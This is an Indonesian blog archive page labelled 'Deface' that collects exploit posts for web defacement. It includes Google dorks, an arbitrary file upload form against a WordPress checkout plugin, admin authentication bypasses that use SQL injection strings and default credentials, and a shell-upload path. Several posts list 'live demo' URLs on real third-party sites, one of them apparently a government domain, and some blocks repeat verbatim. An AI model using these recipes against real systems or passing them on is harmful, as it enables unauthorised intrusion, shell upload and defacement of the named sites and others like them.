Showing posts with label Deface. Show all posts
Showing posts with label Deface. Show all posts
Kumpulan Web Vuln SQL 1n73ction
DefaceThis summary is not available. Please
click here to view the post.
WordPress Plugins WP Checkout - Arbitrary File Upload
Deface
# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7
1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/
2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!
3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html
1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/
2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!
3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html
EasyWebEditor 8.6 Authentication Bypass
Deface
# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=
# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin
http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com
NB : ini poc bisa di pake sql / bypass admin
Zamikinfotech Admin-Login Bypass
Deface
Google Dork : Designed By zamikinfotech.in™
Tested on : Kali Linux
Data : 2017-06-01
Blog : http://www.trazer.org/
Forum : http://www.turkz.org/Forum/
Tutorial :
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345
OR
[+] Username: '=' 'or'
[+] Password: '=' 'or'
Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php
UpDone check Shell Upload Vulnerability
Deface
# Exploit Author :
# Dork : intext:UpDone check :/sites/default/files/up.php
# Tested on : Win 10
#################################################################################
#
# [+] Exploit : site.com/sites/default/files/up.php
#
# [+] File Location : site.com/sites/default/files/your_file.php
#
# [+] Live Demo : http://toy-info.kz/sites/default/files/up.php
#
#################################################################################
# Forum: https://forum.errorviolence.com/index.php
# Website: https://errorviolence.com/
# Discovered By: MD15
Subscribe to:
Posts (Atom)